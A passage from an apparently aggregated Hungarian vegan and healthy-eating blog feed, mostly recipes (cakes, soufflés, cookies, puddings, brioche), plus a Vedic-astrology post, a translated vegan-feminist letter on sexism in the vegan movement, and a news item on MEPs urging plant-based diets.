A banánokat villával összenyomkodjuk, majd hozzákeverjük a liszteket, a szódabikarbónát, a növényi tejet és az édesítőszert. Sűrűbb tészta kell legyen, valamivel sűrűbb. mint egy piskótáé. Hozzáadjuk az aszalt gyümölcsöket. (Én aszalt barackot, meggyet, szilvát, datolyát, banánt, áfonyát adtam hozzá.) Jól összekeverjük, végül pár csepp (1-2 evőkanálnak megfelelő) citrusféle levét. A püspökkenyérformát - amennyiben nem szilikonanyagú - kibéleljük sütőpapírral, majd beleöntjük a tésztát. 170°C-ra előmelegített sütőben sütjük kb. 45-55 percig. Tűpróbával ellenőrizzük, hogy átsült-e. Ha már nagyon pirulna a teteje sütés közben, alufóliát tegyünk a tetejére. Ha megsült, sütőből és formából óvatosan kiemelve rácson hagyjuk kihűlni. Kihűlés után szeletelhető.
Ha márványos tésztát szeretnénk, mielőtt a formába öntenénk, az alaptésztát két részre válsztjuk, az egyikhez kakaót vagy karobot keverünk. Ezután rétegezve öntjük bele a formába a két tésztát.
A tetejére csokimázt is készíthetünk karob/kakaó, folyékony kókuszzsír és datolyaszirup/etirit/nyírfacukor (ki milyen édesítőt használ) trióból. A jó elegyedéshez lehet némi hő szükséges a főzőlapunkon. A csokis krém sűrűsége kenhető állagú kell legyen. Ha rákentük a kihűlt banánkenyérre, hűtőben hagyjuk pihenni, dermedni.
Répás sajtos felfújt
Ebben a jó időben mindenkinek jól esik egy könnyed vacsora. A felfújtakat nem csak édesen készítheted el. Próbáltad már sósan? Ha nem akkor ezt a kombót próbáld ki. Megéri ! Hozzávalók - 3répa - 150gr zabliszt - 4tojás - 200gr sajt - 100gr túró - fél zacskó sütőpor - só Így készítsd - A sajtot és a répát leszeld le - Add hozzá a tojássárgáját a túrót és zablisztet - Verd fel a tojásfehérjét a sóval és a sütőporral - Forgasd a répás keverékbe - Sütőpapírral bélelt tepisbe kanalazz lepényeket - Süsd 180fokon 35percig
banános kókuszkorong
A napközben megéheznél, vagy szívesen rágcsálnál valamit, akkor van egy jó tippem. Ez a finomságokkal teli édesség, ami feldobja a monoton hétköznapokat. Hozzávalók - 2banán - 1 avokádó - 35gr kesudió - 100gr kókuszliszt - 50gr zabpehely - 20gr édesítő - 150gr joghurt Így készítsd - A banánt, avokádót és joghurtot turmixold össze - Keverd össze a száraz alapanyagokat, majd öntsd hozzá a gyümölcsturmixot - Formázz korongokat, majd helyezd sütőpapírra - Süsd 180fokon 25-30percig
A negyedik születésnapi torta (nyers, vegán, gluténmentes)
2017. május 10. Zizi kalandjai
El sem hiszem, hogy a nagyobbik kisfiam, Ádi már négy éves lett! Tisztán emlékszem a születésének minden pillanatára, az első fogának kibújására, az első önálló lépéseire, amikor tíz hónapos kora körül elkezdődött az übercukiság időszaka, ami azóta is tart, csak most már kiegészül gondolkodással, értelemmel. Két gyerek anyukájaként látom most már, hogy minden gyerek más és más, nagyon különbözőek a testvérek is. Ádi is teljesen más gyerek, mint Ákos. Persze huncutságban, zsiványságban nincs akadály egyikőjüknél sem! Nagyon nehéz két zsivánnyal a mindennapokat “túlélni”, de ilyenkor Éva barátnőm szavai csengenek a fülemben: “Ezeket az éveket senki nem adja vissza nekünk! Töltsünk velük olyan sok időt, amennyit csak tudunk!”
Ádi már magyarázó kiskrapek hihetetlenül jó humorral. Folyamatosan kérdez, nem győzünk a kérdéseire válaszolni és persze olyan kérdésekkel is bombáz, amire nem tudjuk a választ (gyorsan utánanézünk a neten, hogy képbe kerüljünk az adott témával kapcsolatban )! Nehéz vele lépést tartani, de igyekszünk. Imád kuktáskodni a konyhában, ezért is kapott egy ilyen szettet a ajándékba.
A szülinapját megint csak a biopiacon ünnepeltük szűk családi és baráti körben, ahogyan tavaly is. Annyira szuper a helyszín, minden adott a piknikezéshez, rohangáláshoz, játszóterezéshez és finom ételekhez. Hasonló dolgokat készítettem, mint tavaly, olyanokat, amelyeket könnyű enni két rohangálás között gyerekeknek és felnőtteknek is.
A tortát együtt választottuk ki Ádival. Az alaprecept a The Happy Pears srácoktól származik, kicsit módosítottam rajta. Az alapja magos-datolyás-vaníliás, középen van egy isteni karamell réteg, a tetején pedig egy egyszerű kókuszkrém. Igen, krém, bár többen az Instagram fotó alapján kókusztejszínhabnak gondoltátok. Nagyon-nagyon tömény torta, elég belőle egy vékony szelet. Nagy kapcsos formában készült, így bőven jutott mindenkinek.
Nyers vegán karamell-kókuszkrém torta Mentés Nyomtatás Előkészítési idő 15 perc Főzési idő 1 óra Teljes idő 1 óra 15 perc Könnyen elkészíthető nyers vegán karamell-kókuszkrém torta. Tömény, de nagyon finom! Szerző: Zizi Recept típusa: sütemény, torta, nyers Konyha: vegán, gluténmentes Adag/mennyiség: 8-10 főre Hozzávalók Torta alaphoz: 100 g dió 100 g kesudió 105 g friss datolya, kimagozva (aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) 2 evőkanál extra szűz kókuszzsír 1 evőkanál kókuszreszelék ¼ teáskanál őrölt vanília Karamell krémhez: 375 g friss datolya, kimagozva aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép) 180 g mandulavaj 9 evőkanál víz 4 evőkanál extra szűz kókuszzsír ½ teáskanál őrölt vanília késhegynyi só Kókusz krémhez: 2 konzerv kókusztej (jó minőségű, 60% kókusz tartalmú), használat előtt hűtőbe téve 2-4 órára 2 evőkanál agavészirup ¼ teáskanál őrölt vanília Tálaláshoz: friss eper Elkészítés Tegyük a diót és a kesudiót a robotgépbe és aprítsuk szemcsésre. Ekkor adjuk hozzá a datolyát, a szobahőmérsékletű kókuszzsírt, kókuszreszeléket, és vaníliát. Dolgoztassuk a gépet addig, amíg a torta alapunk összeáll tésztává. A tortaformát béleljük ki folpackkal vagy kenjük ki kókuszolajjal és nyomkodjuk az aljába a datolyás diós-kesudiós keveréket, majd tegyük a hűtőbe megkeményedni, amíg elkészítjük a többi réteget. Mossuk el a robotgép tartályát. Tegyük a mandulavajat, a datolyát, a szobahőmérsékletű kókuszzsírt, a vaníliát és a sót a robotgépbe. Kezdjük el dolgoztatni a gépet és lassan adagoljuk hozzá a vizet. Akkor van kész, ha karamell ízű és nyúlós az állaga, mint a karamellnek. Kenjük ezt a krémet (kicsit nehézkes a nyúlós állaga miatt) a datolyás diós-kesudiós alapra és tegyük vissza a hűtőbe. Vegyük ki a kókusztejet a hűtőből és bontsuk ki. A hideg hatására kettévált a sűrű krémes rész a vizestől. Kanalazzuk ki a krémet mindkét konzervből egy tálkába. A vizes részt tegyük hűtőbe és használjuk fel turmixok készítéséhez. Adjuk a krémhez az agavészirupot és a vaníliát, majd jól keverjük el és kanalazzuk a torta tetejére. Tálalásig tartsuk hűtőben (legalább 2 órát)! Tálaljuk friss eperrel! Jegyzetek 23 cm-es kapcsos tortaformában készült. Feltétlen jó minőségű minél magasabb zsírtartalmú konzerv kókusztejet használjunk ehhez a recepthez. Édesítésre agavészirupot használtam, hogy megmaradjon a krém fehér színe, de természetesen használhatunk juharszirupot, vagy datolyaszirupot is. Ebben az esetben a krém drapp, világosbarna színű lesz. 3.5.3226
Répatorta ízű túrókrém
Ebben a jó időben mindenkinek jól esik egy könnyed finomság. Én személy szerint imádom a túrót, ráadásul fehérjebevitel szempontjából is tökéletes választás. Édesen és sósan is fogyasztható, rengeteg ízvilágban elkészíthető, így lehetetlen megunni. Hozzávalók - 150gr túró - 1 répa - 2 marék mazsola - 2 marék dió - fahéj Így készítsd 1.Hámozd meg a répát, majd karikázd fel2.Tedd turmixgépbe az összes hozzávalót és turmixold, míg krémes állagot nem kapsz
Az év legkedvezőbb napja április 28. - Akshaya Tritiya
2017. április 27. Élj harmóniában
A védikus asztrológia szerint, idén 2017-ben, az év legkedvezőbb napja (Akshaya Tritiya) április 28-ára esik. Ezen a napon a Nap és a Hold olyan együttállása figyelhető meg, amikor minden cselekedeted nagyon eredményes lesz, ezért érdemes odafigyelni arra, hogy olyan dolgokat csinálj, amik kedvezően hatnak. - Indítsd a napod tudatosan - kelj korán, tisztálkodj meg, tápláld a tested egészséges, finom ételekkel - Végezz jógagyakorlatokat, meditálj - Érdemes ilyenkor új dolgokba belekezdeni, így kapsz egy jó kis lendületet és biztosan sikerülni is fog, amibe belekezdesz - mivel ez egy győzedelmes bolygóállás siker koronázza majd minden tettedet (pl. valami új üzleti dolgot indítani, házasságot kötni ) - Ideális ez a nap fogadalmak megtételére is - Kedvezően hat és nagyon sok pozitív karmát termel az is, ha ezen a napon arra érdemes személyeknek, vagy jó célra adományozol - Mindig jó, de ezen a napon különösen jó ha segítesz másoknak, önzetlen cselekedeteket végzel Használ ki ennek a csodás napnak a lehetőségét. Amiket kerülj ezen a napon: a veszekedés, a rosszindulat, a negatív cselekedetek, olyan dolgok, amivel másoknak nehézséget, bánatot okozol.
Grillezett zöldségek kölessel
2017. április 27. Vegán receptek Tőlünk Nektek
Krisztától:
Hozzávalók:
- karikára vágott zeller
- só
- olaj
- sómentesvegeta
- édesburrgonya
- cukkini
- szójaszósz
- köles
A zellerkarikákat megfőzöm,majd kiveszem a vízből és olajos tepsibe rakom, ráteszek egy kis sót, sómentes vegetát, majd a tetejét meglocsolom pici olajjal. Ha kihűlt, letakarom és egy éjszakára pácolódik a hűtőben.
Másnap a tepsi zellert beteszem az előmelegített sütőbe, alsó-felső légkeveréses sütéssel 170 fokon kb. fél óra alatt megsütöm. Egyszer kell megfordítani, kb. 20 perc után. Eközben megmosom az édesburgonyát, cikkekre vágom pucolás nélkül és egy másik tepsiben, vagy a zeller után, ugyanezzel az egyszerű fűszerezéssel 20 perc alatt megsütöm. Nem érdemes túl-, agyonfűszerezni, mert a zeller és az édesburgonya is isteni ízű. Közben a cukkinit megmosom, végeit levágom, hosszú szeletekre vágom és beteszem a grill melegszendvics sütőbe, olajjal, fűszerek nélkül. Kb 2-3 perc 1800 Watton.
Utólag szójaszószt teszek rá. Kölest főztem hozzá, de pirított kenyeres szendvicsbe is nagyon finom !
Jó Étvágyat!
Kókuszos csokis keksz
2017. április 26. Beautilicious
Egy kis csokis keksznek senki nem tud ellenállni, de nem is kell, hisz ha ezt eszed, a bűntudatnak nincs helye. :) Hozzávalók - 1cukkini - 160gr zab - 40gr kókuszreszelék - 30gr kakaópor - 20gr édesítőszer Így készítsd - A megtisztított cukkinit pépesítsd - Add hozzá a kókuszreszeléket, kakaóport és az édesítőt - A zabpelyhet pirítsd le, majd keverd a cukkinis keverékhez - Öntsd a masszát stőpapírral bélelt tespibe - Süsd 175fokon 40percig
Túrós piskótatekercs
2017. április 21. Beautilicious
A piskótatekercs azok az édességek közé tartoznak, melyekről sose tudnék lemondani, de nem is kell. Mindig csak a fejemet fogom, mikor hallom azoktól akik fogyni akarnak, hogy nem tudnak lemondani az ilyen olyan édességekről. Én napi szinten fogyasztom ezeket az édességeket minden bűntudat nélkül, hisz a legtöbb zöldséget, gyümölcsöt, "jó" szénhidrátokat tartalmaz, mint ez a túrós piskótatekercs is. hozzávalók - 3 nagyobb répa - 7tojás ( 5sárgája 7fehérje) - 4ek édesítő - fahéj - 175gr zabliszt - 500gr túró - 2tojássárgája - 200gr joghurt - fahéj - 3ek édesítő így készítsd - A tojásokat válaszd ketté - A sárgáját verd fel fehéredésig az édesítővel, majd adj hozzá fahéjat és a lisztet - A répát tisztítsd meg, reszeld le, majd add a sárgájához - A fehérjét verd kemény habbá, majd óvatosan forgasd a répás keverékhez - Süsd előmelegített sütőben 180 fokon 25-30percig - A túrókrémhez csak keverd össze a hozzávalókat, majd ha kisült a piskót, még melegen töltsd bele és tekerd fel a piskótát.
Csokicsipszes briós
Ezekből a brioche-okból egy falat sohasem elég. Még Londonban éltünk, amikor az utolsó hetekben egy nagyon finom, puha, csokicsipszes édes pékárut kóstoltam. Nem volt vegán, ami zavart is, de érdekelt, milyen az íze a francia "beütése" miatt is. Finom volt. Azóta is sok helyen látok. A legtöbb üzletnek van saját márkás "Brioche Chocolate Chips Rolls" zacskóba csomagolva. Általában 8 darab van benne, s elképesztő, milyen sok üres kalória van egyetlen "roll"-ban. Egy ilyen kis tekercs/hosszúkás zsömle akár 120-140 kalóriát is tartalmaz. Azért döbbenetes, mert éhségcsillapításra aztán cseppet sem alkalmas, inkább csak ennél még és még belőle. Nem csak vegánnal, de olyannal sem találkoztam, amibe legalább némi teljes kiőrlésű liszt van. Így hát nem hagyott békén a gondolat, hogy ezt nekem is ki kell próbálnom a saját utam szerint először is tojás és állati tej nélkül, másodszor a gyilkos fehér cukrot lecserélve egészségesebb édesítőre, harmadszor a fehér liszt egy részéhez teljes kiőrlésű és zabpehely lisztet keverve. No így már sokkal jobb volt. Így készült el a vegán csokicsipszes briosom vegán változata franciák után szabadon. Persze ebből is ennél még és még, de legalább valamivel egészségesebb hozzávalókkal készült.
A recept
Hozzávalók:
- 2,5 dkg élesztő
- 5 dl növényi tej
- 10 dkg kókuszzsír + a tészta kenéséhez
- 15 dkg fehér liszt
- 15 dkg teljes kiőrlésű liszt
- 10 dkg őrölt zabpehely
- 2 ek nyírfacukor/nádcukor/kókuszvirágcukor, stb
- 2 ek kevés vízben áztatott őrölt lenmag (tojás helyett)
- csipetnyi só
- vanília
- étcsoki csipsz (vegán)
Elkészítés:
Egy tálba vagy a kenyérsütő üstjébe belemorzsoljuk az élesztőt, hozzáadunk 2 ek édesítőszert (nyírfacukrot használtam), majd felöntjük a kézmeleg növényi tejjel. Várunk 1-2 percet, majd a fenti sorrendben hozzáadjuk a többi hozzávalót, kivéve a csoki csipszeket. A dagasztás/kelesztés programon elindítjuk. Ennek híjával fakanállal vagy a kezünkkel úgy gyúrjuk össze a tésztát, addig dagasztjuk kezünkkel, míg a táltól az elválik és hólyagocskák jelennek meg a dagasztás során. Ha kézzel dolgoztunk, meleg helyen konyharuhával letakarva kelesztjük. A kenyérsütő a program szerint elvégzi ezt.
A kész tésztát lisztezett deszkán kinyújtjuk, megszórjuk csoki csipszekkel, feltekerjük mint egy hengert, majd szeleteket vágunk belőle, amiket sütőpapíros tepsire fektetünk. Másik lehetőség, hogy vastagabb tésztát pogácsaszaggatóval kiszaggatunk, vagy apró zsömléket formázunk a tésztából. Persze tudom, a magyar pékségek briósa egészen másképp néz ki, mint az angol. Akár briósokat is csavarhatunk belőlük. Ez esetben vékonyabb rudakat kell vágni, majd felcsavarni. A tetejét egy pici folyékony kókusz-zsírral érdemes megkenni. Ettől fényesebb lesz. Közepes lángon megsütjük. A sütés utolsó 10 percében egy kis édes vaníliás növényi tejjel megkenhetjük. Ettől lesz kívül enyhén roppanós, belül puha.
csokipuding cukkiniből
2017. április 19. Beautilicious
Képzeljétek, én kisgyerekként egészen sokáig nem voltam hajlandó megenni a zöldségeket, gyümölcsöket. Vicces, mára már nem tudom elképzelni nélkülük a napjaimat. Rengeteg féle képpen fogyasztom őket, és egyre több oldalukat vélem felfedezni. A hétvégén nagyon megkívántam a csokipudingot, de az ünnepek miatt abból kellett gazdálkodnom, amit találtam itthon, így megszületett ez a meglepően finom csokipuding. Hozzávalók - 1 cukkini - 60gr zabliszt - 30gr kakaópor - 45gr édesítő Így készítsd - A megtisztított cukkinit vágd kockára, majd aprítóban pépesítsd - Add hozzá a többi hozzávalót, majd alaposan keverd össze - Tedd hűtőbe és hagyd állni legalább 3órát , hogy sűrű puding állagot kapj
Kakaós-Céklás kölesfelfújt
2017. április 18. Beautilicious
Egészség, édesség, szuperfood egy helyen? Ebben a sütiben mindegyiket megtalálod. íNagyon finom, tápértékekben gazdag, ráadásul elkészíteni is pofon egyszerű. Hozzávalók - 250gr köles - 2 cékla - 550ml növényi tej / tej - 5ek édesítő - 35gr kakaópor - 5 tojás Így készítsd - Főzd puhára a kölest tejben, majd tedd félre kihűlni - A célkát tisztítsd meg, pépesítsd, majd keverd a köleshez - A tojásokat válaszd ketté - A sárgájához add az édesítőt és a kakóport, majd alaposan keverd össze robotgéppel - Add hozzá a céklás kölest - A tojásfehérjét verd kemény habbá, majd keverd a köleses keverékhez, úgy, hogy a tojásfehérje ne törjön össze - Süsd 180fokon 45percig
Medvehagymás kocka (vegán)
2017. április 13. Dulmina tündérkonyhája
Akár húsvétra is ajánlom ezt az igazán tavaszias hangulatú sós csemegét. Tészta: 15 dkg teljes kiőrlésű liszt, 15 dkg fehér kenyérliszt, 1 kávéskanál cukor, 1 dkg élesztő, langyos víz. Tálba szitálom a kétféle lisztet, mélyedést csinálok bele, rászórom a cukrot, belemorzsolom az élesztőt, kevés langyos vizet öntök rá, picit megkeverem a folyadékot, és megvárom, míg felfut az élesztő. Aztán
Rákóczi túrós
2017. április 11. Beautilicious
Itt a húsvét, de a süteményeim már jól ismeri a család, így gondoltam, valami újjal fogok előrukkolni. Ennek céljából egy magyar klasszikust választottam, ami cseppet sem lett klasszikus, de nnál inkább egészséges és finom. Hozzávalók - baracklekvár tésztához: - 3répa - 300gr zabliszt - 4tojás - 60gr édesítő - 200gr tejföl - fél csomag sütőpor Túrókrémhez: - 500gr túró - 200gr tejföl - 40gr édesító - 1 citrom héja+leve - 2 tojássárgája Tetejére: - 4tojásfehérje - 3tk édesítő Így készítsd - A megtisztított répát reszeld le - Válaszd ketté a tojásokat - Add a sárgáját a répához - Ehhez tedd hozzá a tejfölt, majd alaposan keverd össze - Keverd össze a száraz alapanyagokat, majd add a répás keverékhez - Verd fel a tojásfehérjét, majd keverd a tésztába, úgy hogy ne törjön össze - A tésztát tedd sütőpapírral bélelt tepsibe, majd süsd míg elkészül a túrókrém - A túrókrémhez csak keverd össze alaposan a hozzávalókat - A tésztára kenj egy réteg lekvárt, majd mehet rá a krém - Süsd, míg a túrókrém szilárd nem lesz, majd vedd ki kenj rá egy réteg lekvárt és tedd rá a tojásfehérje habot, majd süsd míg szép színt nem kap a tojásfehérje hab.
Kedves újdonsült vegán!
[kép leírása: két félmeztelen, fehér, vékony, cisznemű nő, a testükre szaggatott vonalak vannak felfestve, és a testrészeik húsipari nevei, egyikük kezében tábla: minden állatnak ugyanolyan részei vannak] Kedves újdonsült vegán! Kapaszkodj, mert kicsit döcögős lesz az utad. Amikor vegánná válsz, az először nagyon stresszes és sokkoló élmény lehet. Megtanulod, hogy mit egyél, mit vegyél, hogyan bánj a barátaiddal és a családtagjaiddal, és, hogy hogyan kezeld az intenzív haragot és szomorúságot, amit akkor érzel, amikor tudatosul benned a más állatok szenvedése. Ezek közül egyik sem lesz könnyű, de kérlek, ne add fel, mert minél tovább kitartasz, annál könnyebb lesz. Megígérem, hogy mindez teljesen normálissá fog válni, méghozzá hamarabb, mint gondolnád. [tartalmi figyelmeztetés: szóba kerül a szexizmus és a nemi erőszak] Valószínűleg meg fogod keresni a vegán közösséget, hogy segítsenek a váltásban, és rengeteg jóbarátot fogsz köztük találni, és rengeteget fogsz tőlük tanulni. Megnyugtat majd, hogy nem vagy egyedül, és, hogy vannak mások is, akik annyira szenvedélyesen meg szeretnék változtatni a világot, mint te. Idővel viszont belátod majd, hogy vegánnak lenni egy dolog, de vegánnak lenni és nőként azonosítani magadat (1) teljesen más tészta. Ha épp párkapcsolatban élsz, lehet, hogy a párod ellenségesen fog reagálni a vegánná válásodra. Főként akkor, ha a társad férfiként azonosítja magát, a vegánságod kihívást jelent a férfiúi tekintélyére nézve. Lehet, hogy kijelenti, hogy sose tudnád őt megváltoztatni (akkor, is ha sose mondtál ilyet). Esetleg ragaszkodik hozzá, hogy főzz neki nem vegán ételeket, vagy menj vele nem vegán éttermekbe enni. Mivel nőként azonosítod magad, úgy érezheted, hogy nyomás nehezedik rád, hogy engedelmeskedj. A nőket kiskoruktól kezdve arra nevelik, hogy a férfiak érdekeit nézzék elsősorban. Ez nem jó, de így van – ne érezd magad rosszul, ha belemész. kép leírása: egy fehér, szemüveges kopaszodó férfi egy hamburgerbe harap, mellette egy fehér vörös nő dühös arccal szóra nyitja a száját Ha nőként azonosítod magad, ne csodálkozz, ha a magukat férfiként azonosító barátaidban is ellenérzéseket vált ki a vegánságod. Például egy jószándékú Facebook-poszt, amiben emlékezteted az olvasóidat, hogy a nem emberi állatoknak is számít az életük, könnyen olyan reakciókat válthat ki a férfiakból, miszerint a.) túl érzelgős vagy, b.) túl nagypofájú vagy, c.)meg vagy őrülve. Az érzelmességet, a véleményednek hangot adást és a szellemi betegségeket mind a nőkkel azonosították a történelem során. A nőket könnyű semmibe venni ha túl nőiesek, vagy nem eléggé nőiesek. Évszázadokon át hisztérikusnak skatulyázták be a nőket, és intézetekbe zártak minket, hogy elhallgattassanak. Sokszor nem tudod, hogy viselkedj: ne legyél túl nyápic, de ugyanakkor azért figyelj a hangnemedre és ne legyél túl agresszív. Látni fogod, hogy lehetetlen nekik eleget tenni, úgyhogy inkább csak tedd, amit teszel, és ne törődj velük. De a vegán nőként nem biztos, hogy itt véget érnek a nehézségeid. Ha úgy döntesz, hogy nem elég egyszerűen vegánnak lenned, és szeretnél aktivistaként is tenni az állatokért, valószínűleg még több férfiak által elkövetett agresszióval fogsz szembesülni. Mivel a vegán aktivisták többsége nő, ezért azt gondolhatod, hogy biztonságos hely neked. Sok szempontból persze az is, rengeteg női szolidaritással is találkozhatsz. Ugyanakkor a vegán mozgalom nagyon is a férfiak irányítása alatt áll. A férfiak vezetik a vegán aktivizmust – ők írják az elméletet, és ők döntik el, hogy milyen stratégia az elfogadható. Ők foglalják el a legtöbb helyet, és az ő hangjuk a leghangosabb. kép leírása: fehér, cisznemű férfi, vegán tanácsadás feliratú pólóban, mikrofonba beszél Ez a gyakorlatban azt jelenti, hogy sok nyomás fog rád nehezedni, hogy vagy csöndben, a színfalak mögött asszisztálj ezeknek a férfiaknak, vagy arra bátorítanak, hogy levetkőzz az egyes kampányok érdekében. Lehet, hogy nem kifejezetten a férfiak bíztatnak rá, hogy levetkőzz (a nők is sokszor részesek ebben), hanem a mozgalom patriarchális normái olyan környezetet teremtettek, ahol a nőktől elvárják, hogy szexuális tárgyak legyenek a az állatok érdekében. Talán elkezdesz arra gondolni, hogy mennyire felszabadító, hogy a jó ügy érdekében meztelen leszel. Ha ez jár az eszedben, akkor állj meg egy pillanatra, és gondold át! Jusson eszedbe, hogy csak vékony, fehér, cisznemű nőknek van megengedve, hogy az állatokért felszabadítsák magukat, és hogy a férfiakat szexuálisan felizgatni nem ugyanaz, mint izgatottá tenni őket a veganizmus ügyéért. Tapasztalaton alapuló kutatások tisztán mutatják, hogy a nők elnyomásának az alkalmazása nem állítja a befogadókat szembe az állatok elnyomásával. Sajnos sokszor találkozhatsz nők felé irányuló szexuális zaklatással és erőszakkal a mozgalmon belül. Nem akarlak megijeszteni, de ez így van, és ezért előre figyelmeztetlek. Nem sokszor beszélnek erről, de valójában eléggé elterjedt. Ha nő vagy, ne hagyd, hogy ez elriasszon, csak arra emlékezz, hogy a nem emberi állatok társadalmi igazságáért küzdeni nem ugyanaz, mint mindenkinek a társadalmi igazságáért küzdeni. Tulajdonképpen azok a férfiak, akik hirdetik, hogy érdeklik őket a nők, színes bőrű emberek és más hátrányosabb embercsoportok jogai, nos, ezek a férfiak ugyanolyan veszélyesek, mint azok, akik nem is tettetik, hogy mindez érdekli őket. Ha te férfiként azonosítod magad, felszólítalak, hogy állj ki a nőkért, és tedd a vegán helyeket biztonságosabbá. Úgy tűnik, a világ megváltoztatása bizony férfimunka. Ha nőként azonosítod magad, akkor valószínűleg ellenállásba fogsz ütközni, ha másként akarsz részt venni az eseményekben, mint a kávéfőzés, vagy a levetkőzés. De ennek nem kell így lennie. Ne hagyd el magad, maradj erős, hallasd a hangod, és követeld meg a tisztelelet. Ragaszkodj hozzá, hogy a vegánság pozitív, megerősítő élmény legyen. Ne hagyd, hogy egyeseknek az elnyomó mentalitása megakadályozzon a fontos munkában, amit elkezdtél. És ti, férfiak – mutassatok szolidaritást a nők iránt. Jól jön a segttségetek. U.i. Ha színes bőrű nő vagy, akkor még tovább kihívásokkal kell szembenézned. Fehér nőként nem ismerem ezeknek a kihívásoknak a kiterjedését, de anni biztos, hogy a vegán mozgalom elég gonosz színvak hely tud lenni néha- Mindenképpen nézz rá a Sistah Vegan Project oldalára. – Corey Lee Wrenn, M.S., A.B.D. Ph.D. magyar fordítás: tudatosvegan forrás: http://veganfeministnetwork.com/dear-new-vegan/ Lábjegyzetek 1. Ez a cikk a női élményről szól, beleértve a transz, interszex és genderqueer nőket is. Meg kell jegyeznünk viszont, hogy a transz, interszex vagy genderqueer vegánok további kihívásokkal találhatják magukat szemben a vegán mozgalmon belül. The post Kedves újdonsült vegán! appeared first on VegaNinja.
csokitorta sütőtökkrémmel
2017. április 8. Beautilicious
A csokitorta minden alkalommal megállja a helyét desszertként, legyen szó szülinapról vagy akár vendégségről. A legkisebbektől a legnagyobbakig mindenki imádja, így a mi menünkből sem maradhat ki. Ezzel a recepttel most a nassolást is egészségessé teheted, ráadásul a gyerekeket sem kell győzködni, hogy fogyasszanak zöldséget. :) Hozzávalók - 300gr+150gr sütőtök - 3tojás - 150gr dió - 250gr zabliszt - 45gr natúr kakaópor - 60gr+40 gr édesítő - 1csomag sütőpor - 150gr+100gr natúr joghurt - 300ml víz - rumaroma - fahéj Így készítsd - A piskótához tedd a 300gr sütőtököt darálógépbe - Add a sütőtökhöz a tojásokat a 150gr joghurtot, egy kis rumaromát - Daráld le a diót, majd add hozzá a lisztet, sütőport, kakaópor és a 60gr édesítőt - Önts hozzá a sütőtökös keveréket, majd mikor ezt összekevered add hozzá fokozatosan a vizet - Öntsd sütőpapírral bélelt sütőbe, majd előmelegített sütőben 180fokon süsd 4percig - A krémhez párolj meg 150gr sütőtököt, majd adj hozzá fahéjat és édesítőt - Ezt turmixold össze, majd ha kihűlt add hozzá a 100gr joghurtot - Mikor kisült a piskóta, hagyd, hogy kihűljön, majd vágd ketté és kend bele a krémet
24 EU képviselő követeli, hogy Európa térjen át a növényi étrendre
Az Európai Parlament 24 képviselője írta alá azt az Európai Bizottságnak címzett levelet, amelyben az állattartás visszaszorítását és a növényi étrendre történő áttérést követelik. ,,A tudományos eredmények egyértelműen igazolják azt, hogy a húsok és tejtermék fogyasztásának visszaszorítása nélkülözhetetlen az üvegházhatású gázkibocsátás érdemi csökkentéséhez. – írják levelükben a képviselők. ,,Az állati termékek túlzott fogyasztása Európában hozzájárul a súlyos krónikus egészségügyi problémák kialakulásához. Azoknak, akik a növényi étrendet követik, alacsonyabb a testsúlyuk, és körükben kisebb az esélye a cukorbetegség, szív-és érrendszeri megbetegedés, vagy rák kialakulásának. Ennek azért is van kiemelkedő jelentősége, mivel az ezen betegségek okozta halálozási arány az európai lakosság körében 80%. A növényi ételek sok krónikus betegséggel szemben védelmet nyújthatnak. Az Egészségügyi Világszervezet folyóiratában megjelent 2008. évi tanulmány alapján a hús-és tejipar EU támogatásának megszüntetése – a telített zsírsavak fogyasztásának 1%-os csökkenésével számolva – 12.844 emberi életet menthet meg a stroke-tól és szívbetegségektől. Ez csak egy nagyon óvatos becslés. Amennyiben a támogatások megszüntetése még ennél is nagyobb hatással lenne a fogyasztás visszaszorítására, az akár még több élet megmentéséhez is hozzájárulhatna, ahogyan Finnországban (5%) és Lengyelországban (7%) történt. Említik továbbá, hogy az Egészségügyi Világszervezet a vörös és feldolgozott húsokat rákkeltőnek minősítette, valamint, hogy a szalonna és egyéb feldolgozott húskészítmények reklámozása kerüljön betiltásra, ami szintén segítené a húsfogyasztás - már most észlelhető - további csökkenését. A levélben az állattartás 2030-ig megvalósítandó visszaszorításának mértékét minimum 30%-ban jelölték meg, tekintettel a növényi étrend környezetvédelmi és egészségügyi előnyeire. A levél alapján ez a csökkentés segíthetne a környezeti terhelés, valamint a hús-és tejipar termékei által okozott komoly krónikus egészségügyi problémák visszaszorításában. Fordította: Tóth Mónika Rozita Forrás: https://www.riseofthevegan.com/blog/eu-members-call-for-a-shift-to-plant-based-diets-to-protect-the-environment The post 24 EU képviselő követeli, hogy Európa térjen át a növényi étrendre appeared first on VegaNinja.
rizsfelfújt
2017. március 26. Beautilicious
Egyszerűen imádom a felfújtakat annyira könnyű és finom nasi, de ezek közt is van egy kedvencem, ami pedig nem más, mint a rizsfelfújt. Nem áll bonyolult hozzávalókból, és az elkészítésébe se fog beletörni a bicskája senkinek. :) Hozzávalók - 350gr barna rizs - 1l tej/ növényi tej - 6 tojás - reszelt citromhéj - 4ek édesítő Így készítsd - Főzd meg a tejben a rizst ( ha nem elég puha, tegyél hozzá még vizet), majd hagyd hűlni - Válaszd ketté a tojásokat - Add a sárgájához a citromhéjat és az édesítőt, majd habverővel verd fel fehéredésig - Verd fel keménxy habbá a tojásfehérjét - Keverd össze a rizst a sárgájával - Forgasd bele a fehérjét - Öntsd tepsibe a masszát, majs előmelegített sütőben süsd 180fokon 30percig
Ezt ettem ma 2017. március 18 szombat
2017. március 18. Gitta nyersétel blogja
Reggel 4 dl citromos víz, majd a szokásos zöld turmix kanállal. Most ebben az volt a különleges, hogy a kertből zsenge csalán levelek is kerültek a turmixba :) Zöld turmix kanállal Délelőtt készítettem kb 6-7 dl mandulatejet (két pohárral lett), a léböjt ideje alatt nem fogok ilyen zsíros italt fogyasztani, de nagyon szeretem. Így ma még beiktattam egy (na jó, kettő) pohárkával. Az elsőt natúran, ízesítés nélkül ittam, így éreztem a mandula ízét, és kortyolgattam, ízlelgetve minden egyes kortyot... A másodikhoz turmixoltam 4 puha édes datolyát, csipet sót, és 2 teáskanál bio kakaóport. Hát, hát ez... kábulatig finom... Isteni mandulatej bio kakaóval A legfinomabb bio kakaópor A mandulatej készítésnél visszamaradt pépből lett az ebédem, összevágtam zöldségeket (brokkoli, lilahagyma és kápia paprika), a mandulapéphez tettem sót, citromlét és sörélesztő pelyhet, és egy kevés vizet. Simára kevertem, majd összekevertem a zöldségekkel. Csíra ment rá, 